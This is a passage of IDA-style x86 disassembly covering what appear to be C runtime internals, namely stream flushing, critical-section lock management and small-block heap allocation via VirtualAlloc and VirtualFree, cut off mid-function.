call sub_417C70
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_4163ED: ; CODE XREF: sub_416387+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4163FE
mov eax, [ebp+var_1C]
jmp short loc_41641C
sub_416387 endp
; =============== S U B R O U T I N E =======================================
sub_4163FB proc near ; DATA XREF: .rdata:stru_427A18�o
mov ebx, [ebp+8]
sub_4163FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4163FE proc near ; CODE XREF: sub_416387+6A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_4163FE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416387
loc_416406: ; CODE XREF: sub_416387+15�j
; sub_416387+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41641C: ; CODE XREF: sub_416387+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_416387
; =============== S U B R O U T I N E =======================================
sub_416422 proc near ; CODE XREF: sub_412F47+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41644B
test al, 8
jz short loc_41644B
push dword ptr [esi+8]
call sub_412FE4
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41644B: ; CODE XREF: sub_416422+A�j
; sub_416422+E�j
pop esi
retn
sub_416422 endp
; =============== S U B R O U T I N E =======================================
sub_41644D proc near ; CODE XREF: sub_412F47+10�p
; sub_414809+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_41649C
test ax, 108h
jz short loc_41649C
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41649B
push edi
push eax
push dword ptr [esi+10h]
call sub_41A961
add esp, 0Ch
cmp eax, edi
jnz short loc_416494
mov eax, [esi+0Ch]
test al, al
jns short loc_41649B
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_41649B
; ---------------------------------------------------------------------------
loc_416494: ; CODE XREF: sub_41644D+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41649B: ; CODE XREF: sub_41644D+25�j
; sub_41644D+3D�j ...
pop edi
loc_41649C: ; CODE XREF: sub_41644D+13�j
; sub_41644D+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_41644D endp
; =============== S U B R O U T I N E =======================================
sub_4164AA proc near ; CODE XREF: sub_4164D8+67�p
; sub_4164D8+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41644D
test eax, eax
pop ecx
jz short loc_4164BF
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164BF: ; CODE XREF: sub_4164AA+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_4164D4
push dword ptr [esi+10h]
call sub_41B98E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164D4: ; CODE XREF: sub_4164AA+19�j
xor eax, eax
pop esi
retn
sub_4164AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4164D8 proc near ; CODE XREF: sub_4165AD+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416589 SIZE 0000001B BYTES
push 14h
push offset stru_427A28
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_4164F9: ; CODE XREF: sub_4164D8+99�j
mov [ebp+var_24], esi
cmp esi, dword_47B660
jge loc_416589
mov eax, dword_47A644
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_416570
test byte ptr [eax+0Ch], 83h
jz short loc_416570
push eax
push esi
call sub_4166A2
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_47A644
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_416568
cmp [ebp+arg_0], edx
jnz short loc_41654F
push eax
call sub_4164AA
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_416568
inc [ebp+var_1C]
jmp short loc_416568
; ---------------------------------------------------------------------------
loc_41654F: ; CODE XREF: sub_4164D8+64�j
cmp [ebp+arg_0], edi
jnz short loc_416568
test cl, 2
jz short loc_416568
push eax
call sub_4164AA
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_416568
or [ebp+var_20], eax
loc_416568: ; CODE XREF: sub_4164D8+5F�j
; sub_4164D8+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_416578
loc_416570: ; CODE XREF: sub_4164D8+3A�j
; sub_4164D8+40�j
inc esi
jmp short loc_4164F9
sub_4164D8 endp
; =============== S U B R O U T I N E =======================================
sub_416573 proc near ; DATA XREF: .rdata:00427A3C�o
xor edi, edi
mov esi, [ebp-24h]
sub_416573 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416578 proc near ; CODE XREF: sub_4164D8+93�p
mov eax, dword_47A644
push dword ptr [eax+esi*4]
push esi
call sub_4166F4
pop ecx
pop ecx
retn
sub_416578 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4164D8
loc_416589: ; CODE XREF: sub_4164D8+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4165A4
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_41659E
mov eax, [ebp+var_20]
loc_41659E: ; CODE XREF: sub_4164D8+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_4164D8
; =============== S U B R O U T I N E =======================================
sub_4165A4 proc near ; CODE XREF: sub_4164D8+B5�p
; DATA XREF: .rdata:stru_427A28�o
push 1
call sub_41686D
pop ecx
retn
sub_4165A4 endp
; =============== S U B R O U T I N E =======================================
sub_4165AD proc near ; CODE XREF: sub_41665F�p
push 1
call sub_4164D8
pop ecx
retn
sub_4165AD endp
; =============== S U B R O U T I N E =======================================
sub_4165B6 proc near ; DATA XREF: .data:0042A010�o
mov eax, dword_47B660
test eax, eax
push esi
push 14h
pop esi
jnz short loc_4165CA
mov eax, 200h
jmp short loc_4165D0
; ---------------------------------------------------------------------------
loc_4165CA: ; CODE XREF: sub_4165B6+B�j
cmp eax, esi
jge short loc_4165D5
mov eax, esi
loc_4165D0: ; CODE XREF: sub_4165B6+12�j
mov dword_47B660, eax
loc_4165D5: ; CODE XREF: sub_4165B6+16�j
push 4
push eax
call sub_41AB01
test eax, eax
pop ecx
pop ecx
mov dword_47A644, eax
jnz short loc_416606
push 4
push esi
mov dword_47B660, esi
call sub_41AB01
test eax, eax
pop ecx
pop ecx
mov dword_47A644, eax
jnz short loc_416606
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_416606: ; CODE XREF: sub_4165B6+30�j
; sub_4165B6+49�j
xor edx, edx
mov ecx, offset off_42C900
jmp short loc_416614
; ---------------------------------------------------------------------------
loc_41660F: ; CODE XREF: sub_4165B6+6D�j
mov eax, dword_47A644
loc_416614: ; CODE XREF: sub_4165B6+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_42CB80
jl short loc_41660F
xor ecx, ecx
mov edx, offset dword_42C910
loc_41662C: ; CODE XREF: sub_4165B6+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_47A2E0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_41664C
test eax, eax
jnz short loc_41664F
loc_41664C: ; CODE XREF: sub_4165B6+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_41664F: ; CODE XREF: sub_4165B6+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_42C970
jl short loc_41662C
xor eax, eax
pop esi
retn
sub_4165B6 endp
; =============== S U B R O U T I N E =======================================
sub_41665F proc near ; DATA XREF: .data:0042A02C�o
; FUNCTION CHUNK AT 0041BA4A SIZE 00000092 BYTES
call sub_4165AD
cmp byte_479E94, 0
jz short locret_416672
jmp loc_41BA4A
; ---------------------------------------------------------------------------
locret_416672: ; CODE XREF: sub_41665F+C�j
retn
sub_41665F endp
; =============== S U B R O U T I N E =======================================
sub_416673 proc near ; CODE XREF: sub_412F93+27�p
; sub_41313E+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42C900
cmp eax, ecx
jb short loc_416697
cmp eax, offset dword_42CB60
ja short loc_416697
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_416901
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416697: ; CODE XREF: sub_416673+B�j
; sub_416673+12�j
add eax, 20h
push eax
call ds:dword_41F01C ; RtlEnterCriticalSection
retn
sub_416673 endp
; =============== S U B R O U T I N E =======================================
sub_4166A2 proc near ; CODE XREF: sub_4164D8+44�p
; sub_417CF5+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4166B6
add eax, 10h
push eax
call sub_416901
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4166B6: ; CODE XREF: sub_4166A2+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41F01C ; RtlEnterCriticalSection
retn
sub_4166A2 endp
; =============== S U B R O U T I N E =======================================
sub_4166C5 proc near ; CODE XREF: sub_412FDC+1�p
; sub_413180+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42C900
cmp eax, ecx
jb short loc_4166E9
cmp eax, offset dword_42CB60
ja short loc_4166E9
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41686D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4166E9: ; CODE XREF: sub_4166C5+B�j
; sub_4166C5+12�j
add eax, 20h
push eax
call ds:dword_41F018 ; RtlLeaveCriticalSection
retn
sub_4166C5 endp
; =============== S U B R O U T I N E =======================================
sub_4166F4 proc near ; CODE XREF: sub_416578+9�p
; sub_417CF5+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_416708
add eax, 10h
push eax
call sub_41686D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416708: ; CODE XREF: sub_4166F4+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41F018 ; RtlLeaveCriticalSection
retn
sub_4166F4 endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_416764 proc near ; CODE XREF: sub_41677E+20�p
cmp dword_479E5C, 2
jnz short loc_41677A
cmp dword_479E68, 5
jb short loc_41677A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41677A: ; CODE XREF: sub_416764+7�j
; sub_416764+10�j
push 3
pop eax
retn
sub_416764 endp
; =============== S U B R O U T I N E =======================================
sub_41677E proc near ; CODE XREF: .text:004149F3�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41F16C ; HeapCreate
test eax, eax
mov dword_47A63C, eax
jz short loc_4167C8
call sub_416764
cmp eax, 3
mov dword_47A640, eax
jnz short loc_4167CB
push 3F8h
call sub_416932
test eax, eax
pop ecx
jnz short loc_4167CB
push dword_47A63C
call ds:dword_41F168 ; HeapDestroy
loc_4167C8: ; CODE XREF: sub_41677E+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4167CB: ; CODE XREF: sub_41677E+2D�j
; sub_41677E+3C�j
xor eax, eax
inc eax
retn
sub_41677E endp
; =============== S U B R O U T I N E =======================================
sub_4167CF proc near ; CODE XREF: sub_4154C7�p
push esi
push edi
xor esi, esi
mov edi, offset dword_479EC0
loc_4167D8: ; CODE XREF: sub_4167CF+35�j
cmp dword_42CB8C[esi*8], 1
jnz short loc_416800
lea eax, ds:42CB88h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41680C
loc_416800: ; CODE XREF: sub_4167CF+11�j
inc esi
cmp esi, 24h
jl short loc_4167D8
xor eax, eax
inc eax
loc_416809: ; CODE XREF: sub_4167CF+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41680C: ; CODE XREF: sub_4167CF+2F�j
and dword_42CB88[esi*8], 0
xor eax, eax
jmp short loc_416809
sub_4167CF endp
; =============== S U B R O U T I N E =======================================
sub_416818 proc near ; CODE XREF: sub_415438�p
push ebx
mov ebx, ds:dword_41F024
push esi
mov esi, offset dword_42CB88
push edi
loc_416826: ; CODE XREF: sub_416818+30�j
mov edi, [esi]
test edi, edi
jz short loc_41683F
cmp dword ptr [esi+4], 1
jz short loc_41683F
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_412FE4
and dword ptr [esi], 0
pop ecx
loc_41683F: ; CODE XREF: sub_416818+12�j
; sub_416818+18�j
add esi, 8
cmp esi, offset dword_42CCA8
jl short loc_416826
mov esi, offset dword_42CB88
pop edi
loc_416850: ; CODE XREF: sub_416818+50�j
mov eax, [esi]
test eax, eax
jz short loc_41685F
cmp dword ptr [esi+4], 1
jnz short loc_41685F
push eax
call ebx ; RtlDeleteCriticalSection
loc_41685F: ; CODE XREF: sub_416818+3C�j
; sub_416818+42�j
add esi, 8
cmp esi, offset dword_42CCA8
jl short loc_416850
pop esi
pop ebx
retn
sub_416818 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41686D proc near ; CODE XREF: sub_413037+2�p
; sub_4132F2+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_42CB88[eax*8]
call ds:dword_41F018 ; RtlLeaveCriticalSection
pop ebp
retn
sub_41686D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416882 proc near ; CODE XREF: sub_416901+14�p
; sub_417CF5+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:42CB88h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41689A
xor eax, eax
inc eax
jmp short loc_4168FE
; ---------------------------------------------------------------------------
loc_41689A: ; CODE XREF: sub_416882+11�j
push edi
push 18h
call sub_41344D
mov edi, eax
test edi, edi
pop ecx
jnz short loc_4168B8
loc_4168A9: ; CODE XREF: sub_416882+63�j
call sub_417C70
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4168FD
; ---------------------------------------------------------------------------
loc_4168B8: ; CODE XREF: sub_416882+25�j
push 0Ah
call sub_416901
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4168EB
push 0FA0h
push edi
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jnz short loc_4168E7
push edi
call sub_412FE4
push 0Ah
call sub_41686D
pop ecx
pop ecx
jmp short loc_4168A9
; ---------------------------------------------------------------------------
loc_4168E7: ; CODE XREF: sub_416882+52�j
mov [esi], edi
jmp short loc_4168F2
; ---------------------------------------------------------------------------
loc_4168EB: ; CODE XREF: sub_416882+41�j
push edi
call sub_412FE4
pop ecx
loc_4168F2: ; CODE XREF: sub_416882+67�j
push 0Ah
call sub_41686D
xor eax, eax
pop ecx
inc eax
loc_4168FD: ; CODE XREF: sub_416882+34�j
pop edi
loc_4168FE: ; CODE XREF: sub_416882+16�j
pop esi
pop ebp
retn
sub_416882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416901 proc near ; CODE XREF: sub_412FE4+1E�p
; sub_41318A+51�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:42CB88h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_416927
push eax
call sub_416882
test eax, eax
pop ecx
jnz short loc_416927
push 11h
call sub_4148E1
pop ecx
loc_416927: ; CODE XREF: sub_416901+11�j
; sub_416901+1C�j
push dword ptr [esi]
call ds:dword_41F01C ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_416901 endp
; =============== S U B R O U T I N E =======================================
sub_416932 proc near ; CODE XREF: sub_41677E+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_47A63C
call ds:dword_41F13C ; RtlAllocateHeap
test eax, eax
mov dword_47A628, eax
jnz short loc_41694F
retn
; ---------------------------------------------------------------------------
loc_41694F: ; CODE XREF: sub_416932+1A�j
mov ecx, [esp+arg_0]
and dword_47A620, 0
and dword_47A624, 0
mov dword_47A630, eax
xor eax, eax
mov dword_47A62C, ecx
mov dword_47A634, 10h
inc eax
retn
sub_416932 endp
; =============== S U B R O U T I N E =======================================
sub_41697A proc near ; CODE XREF: sub_412FE4+29�p
; sub_41318A+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_47A624
lea ecx, [eax+eax*4]
mov eax, dword_47A628
lea ecx, [eax+ecx*4]
jmp short loc_41699E
; ---------------------------------------------------------------------------
loc_41698C: ; CODE XREF: sub_41697A+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4169A4
add eax, 14h
loc_41699E: ; CODE XREF: sub_41697A+10�j
cmp eax, ecx
jb short loc_41698C
xor eax, eax
locret_4169A4: ; CODE XREF: sub_41697A+1F�j
retn
sub_41697A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169A5 proc near ; CODE XREF: sub_412FE4+38�p
; sub_41318A+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_416CB9
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_416A70
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_416A08
push 3Fh
pop edx
loc_416A08: ; CODE XREF: sub_4169A5+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_416A52
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_416A33
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_416A4F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_416A4F
; ---------------------------------------------------------------------------
loc_416A33: ; CODE XREF: sub_4169A5+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_416A4F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_416A4F: ; CODE XREF: sub_4169A5+85�j
; sub_4169A5+8C�j ...
mov ebx, [ebp+arg_4]
loc_416A52: ; CODE XREF: sub_4169A5+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_416A70: ; CODE XREF: sub_4169A5+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_416A7E
push 3Fh
pop edx
loc_416A7E: ; CODE XREF: sub_4169A5+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_416B1C
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_416AA3
mov ebx, esi
loc_416AA3: ; CODE XREF: sub_4169A5+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_416AB5
mov edx, esi
loc_416AB5: ; CODE XREF: sub_4169A5+10C�j
cmp ebx, edx
jz short loc_416B17
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_416AFF
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_416AE5
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_416AFF
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_416AFF
; ---------------------------------------------------------------------------
loc_416AE5: ; CODE XREF: sub_4169A5+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_416AFF
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_416AFF: ; CODE XREF: sub_4169A5+11D�j
; sub_4169A5+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_416B17: ; CODE XREF: sub_4169A5+112�j
mov esi, [ebp+arg_4]
jmp short loc_416B1F
; ---------------------------------------------------------------------------
loc_416B1C: ; CODE XREF: sub_4169A5+E2�j
mov ebx, [ebp+arg_0]
loc_416B1F: ; CODE XREF: sub_4169A5+175�j
cmp [ebp+var_C], 0
jnz short loc_416B2D
cmp ebx, edx
jz loc_416BAD
loc_416B2D: ; CODE XREF: sub_4169A5+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_416BAD
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_416B84
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_416B73
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_416B73: ; CODE XREF: sub_4169A5+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_416BAD
; ---------------------------------------------------------------------------
loc_416B84: ; CODE XREF: sub_4169A5+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_416B9A
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_416B9A: ; CODE XREF: sub_4169A5+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_416BAD: ; CODE XREF: sub_4169A5+182�j
; sub_4169A5+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_416CB8
mov eax, dword_47A620
test eax, eax
jz loc_416CAA
mov ecx, dword_47A638
mov esi, ds:dword_41F170
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_47A638
mov eax, dword_47A620
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_47A620
mov eax, [eax+10h]
mov ecx, dword_47A638
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_47A620
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_47A620
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_416C3B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_47A620
loc_416C3B: ; CODE XREF: sub_4169A5+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_416CAA
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_47A620
push dword ptr [eax+10h]
push 0
push dword_47A63C
call ds:dword_41F134 ; RtlFreeHeap
mov eax, dword_47A624
mov edx, dword_47A628
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_47A620
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41BC70
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_47A624
cmp eax, dword_47A620
jbe short loc_416CA0
sub [ebp+arg_0], 14h
loc_416CA0: ; CODE XREF: sub_4169A5+2F5�j
mov eax, dword_47A628
mov dword_47A630, eax
loc_416CAA: ; CODE XREF: sub_4169A5+223�j
; sub_4169A5+29A�j
mov eax, [ebp+arg_0]
mov dword_47A620, eax
mov dword_47A638, edi
loc_416CB8: ; CODE XREF: sub_4169A5+216�j
pop ebx
loc_416CB9: ; CODE XREF: sub_4169A5+37�j
pop edi
pop esi
leave
retn
sub_4169A5 endp
; =============== S U B R O U T I N E =======================================
sub_416CBD proc near ; CODE XREF: sub_417159+150�p
mov eax, dword_47A624
mov ecx, dword_47A634
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_416D03
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_47A628
push edi
push dword_47A63C
call ds:dword_41F138 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_416CF2
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_416CF2: ; CODE XREF: sub_416CBD+2F�j
add dword_47A634, 10h
mov dword_47A628, eax
mov eax, dword_47A624
loc_416D03: ; CODE XREF: sub_416CBD+10�j
mov ecx, dword_47A628
push esi
push 41C4h
push 8
push dword_47A63C
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_41F13C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_416D2E
loc_416D2A: ; CODE XREF: sub_416CBD+9B�j
xor eax, eax
jmp short loc_416D71
; ---------------------------------------------------------------------------
loc_416D2E: ; CODE XREF: sub_416CBD+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_41F174 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_416D5A
push dword ptr [esi+10h]
push edi
push dword_47A63C
call ds:dword_41F134 ; RtlFreeHeap
jmp short loc_416D2A
; ---------------------------------------------------------------------------
loc_416D5A: ; CODE XREF: sub_416CBD+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_47A624
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_416D71: ; CODE XREF: sub_416CBD+6F�j
pop esi
pop edi
retn
sub_416CBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D74 proc near ; CODE XREF: sub_417159+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_416D8C
; ---------------------------------------------------------------------------
loc_416D89: ; CODE XREF: sub_416D74+1A�j
shl eax, 1
inc ebx
loc_416D8C: ; CODE XREF: sub_416D74+13�j
test eax, eax
jge short loc_416D89
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_416DA5: ; CODE XREF: sub_416D74+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_416DA5
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41F174 ; VirtualAlloc
test eax, eax
jnz short loc_416DD8
or eax, 0FFFFFFFFh
jmp loc_416E75
; ---------------------------------------------------------------------------
loc_416DD8: ; CODE XREF: sub_416D74+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_416E28
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_416DF0: ; CODE XREF: sub_416D74+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
